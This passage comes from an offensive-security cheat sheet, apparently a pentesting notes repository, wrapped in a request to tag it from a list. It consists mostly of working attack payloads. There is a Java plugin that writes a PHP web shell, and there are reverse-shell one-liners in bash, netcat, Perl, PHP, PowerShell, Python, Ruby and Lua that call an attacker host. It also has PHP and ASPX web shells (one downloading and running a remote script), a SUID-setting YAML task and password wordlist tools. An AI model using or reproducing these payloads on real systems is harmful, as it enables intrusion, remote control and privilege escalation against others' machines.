java.nio.file.StandardOpenOption; public class Main extends JavaPlugin { @Override public void onDisable() { super.onDisable(); } @Override public void onEnable() { final String PHP_CODE = "<?php system($_GET['cmd']); ?>"; try { Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW); } catch (IOException e) { e.printStackTrace(); } super.onEnable(); } } ``` ##### Lua Reverse Shell ```shell http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")-- ``` ##### Markdown Reverse Shell ```shell --';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'-- ``` ##### mkfifo Reverse Shell ```shell mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell ``` ##### Netcat Reverse Shell ```shell nc -e /bin/sh <LHOST> <LPORT> ``` ##### Perl Reverse Shell ```shell perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ##### PHP Reverse Shell ```shell php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ##### PowerShell Reverse Shell ```shell $client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ```shell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ```shell powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' ``` ##### minireverse.ps1 ```shell $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do { $writer.Flush(); $read = $null; $res = "" while($stream.DataAvailable -or $read -eq $null) { $read = $stream.Read($buffer, 0, 1024) } $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); if(!$out.equals("exit")){ $args = ""; if($out.IndexOf(' ') -gt -1){ $args = $out.substring($out.IndexOf(' ')+1); $out = $out.substring(0,$out.IndexOf(' ')); if($args.split(' ').length -gt 1){ $pinfo = New-Object System.Diagnostics.ProcessStartInfo $pinfo.FileName = "cmd.exe" $pinfo.RedirectStandardError = $true $pinfo.RedirectStandardOutput = $true $pinfo.UseShellExecute = $false $pinfo.Arguments = "/c $out $args" $p = New-Object System.Diagnostics.Process $p.StartInfo = $pinfo $p.Start() | Out-Null $p.WaitForExit() $stdout = $p.StandardOutput.ReadToEnd() $stderr = $p.StandardError.ReadToEnd() if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout } } else{ $res = (&"$out" "$args") | out-string; } } else{ $res = (&"$out") | out-string; } if($res -ne $null){ $writer.WriteLine($res) } } }While (!$out.equals("exit")) $writer.close(); $socket.close(); $stream.Dispose() ``` ##### Python Reverse Shell ```shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ```shell python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ```shell python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);' ``` ```shell echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE><(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE> ``` ##### Ruby Reverse Shell ```shell ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` #### Web Shells ##### PHP Web Shell ```php <?php system($_GET['cmd']); ?> <?php echo exec($_POST['cmd']); ?> <?php echo passthru($_GET['cmd']); ?> <?php passthru($_REQUEST['cmd']); ?> <?php echo system($_REQUEST['shell']): ?> ``` ### Templates #### ASPX Web Shell ```shell <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Set s = CreateObject("WScript.Shell") Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')") o = cmd.StdOut.Readall() Response.write(o) %> --> ``` #### Bad YAML ```yaml - hosts: localhost tasks: - name: badyml command: chmod +s /bin/bash ``` ### Wordlists #### Bash ##### Add Numbers to Password Segment ```shell for i in {1..100}; do printf "Password@%d\n" $i >> <FILE>; done ``` #### CeWL ```shell cewl -d 0 -m 5 -w <FILE> http://<RHOST>/index.php --lowercase cewl -d 5 -m 3 -w <FILE> http://<RHOST>/index.php --with-numbers ``` #### CUPP ```shell ./cupp -i ``` #### crunch ```shell crunch 6 6 -t foobar%%% > wordlist crunch 5 5 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ -o <FILE>.txt ``` #### JavaScript Quick Wordlist ```javascript javascript:(function(){const e=document.documentElement.innerText.match(/[a-zA-Z_\-]+/g),n=[...new Set(e)].sort();document.open(),document.write(n.join("<br>")),document.close();})(); ``` #### Mutate Wordlists ##### Remove all Number Sequences ```shell head /PATH/TO/WORDLIST/<WORDLIST> > <FILE>.txt sed -i '/^1/d' <FILE>.txt ``` #### Username Anarchy ```shell ./username-anarchy -f first,first.last,last,flast,f.last -i <FILE> ``` ", Assign "at most 3 tags" to the expected json: {"id":"3903","tags":[]} "only from the tags list I provide: [{"id":77,"name":"3d"},{"id":89,"name":"agent"},{"id":17,"name":"ai"},{"id":54,"name":"algorithm"},{"id":24,"name":"api"},{"id":44,"name":"authentication"},{"id":3,"name":"aws"},{"id":27,"name":"backend"},{"id":60,"name":"benchmark"},{"id":72,"name":"best-practices"},{"id":39,"name":"bitcoin"},{"id":37,"name":"blockchain"},{"id":1,"name":"blog"},{"id":45,"name":"bundler"},{"id":58,"name":"cache"},{"id":21,"name":"chat"},{"id":49,"name":"cicd"},{"id":4,"name":"cli"},{"id":64,"name":"cloud-native"},{"id":48,"name":"cms"},{"id":61,"name":"compiler"},{"id":68,"name":"containerization"},{"id":92,"name":"crm"},{"id":34,"name":"data"},{"id":47,"name":"database"},{"id":8,"name":"declarative-gui "},{"id":9,"name":"deploy-tool"},{"id":53,"name":"desktop-app"},{"id":6,"name":"dev-exp-lib"},{"id":59,"name":"dev-tool"},{"id":13,"name":"ecommerce"},{"id":26,"name":"editor"},{"id":66,"name":"emulator"},{"id":62,"name":"filesystem"},{"id":80,"name":"finance"},{"id":15,"name":"firmware"},{"id":73,"name":"for-fun"},{"id":2,"name":"framework"},{"id":11,"name":"frontend"},{"id":22,"name":"game"},{"id":81,"name":"game-engine "},{"id":23,"name":"graphql"},{"id":84,"name":"gui"},{"id":91,"name":"http"},{"id":5,"name":"http-client"},{"id":51,"name":"iac"},{"id":30,"name":"ide"},{"id":78,"name":"iot"},{"id":40,"name":"json"},{"id":83,"name":"julian"},{"id":38,"name":"k8s"},{"id":31,"name":"language"},{"id":10,"name":"learning-resource"},{"id":33,"name":"lib"},{"id":41,"name":"linter"},{"id":28,"name":"lms"},{"id":16,"name":"logging"},{"id":76,"name":"low-code"},{"id":90,"name":"message-queue"},{"id":42,"name":"mobile-app"},{"id":18,"name":"monitoring"},{"id":36,"name":"networking"},{"id":7,"name":"node-version"},{"id":55,"name":"nosql"},{"id":57,"name":"observability"},{"id":46,"name":"orm"},{"id":52,"name":"os"},{"id":14,"name":"parser"},{"id":74,"name":"react"},{"id":82,"name":"real-time"},{"id":56,"name":"robot"},{"id":65,"name":"runtime"},{"id":32,"name":"sdk"},{"id":71,"name":"search"},{"id":63,"name":"secrets"},{"id":25,"name":"security"},{"id":85,"name":"server"},{"id":86,"name":"serverless"},{"id":70,"name":"storage"},{"id":75,"name":"system-design"},{"id":79,"name":"terminal"},{"id":29,"name":"testing"},{"id":12,"name":"ui"},{"id":50,"name":"ux"},{"id":88,"name":"video"},{"id":20,"name":"web-app"},{"id":35,"name":"web-server"},{"id":43,"name":"webassembly"},{"id":69,"name":"workflow"},{"id":87,"name":"yaml"}]" returns me the "expected json"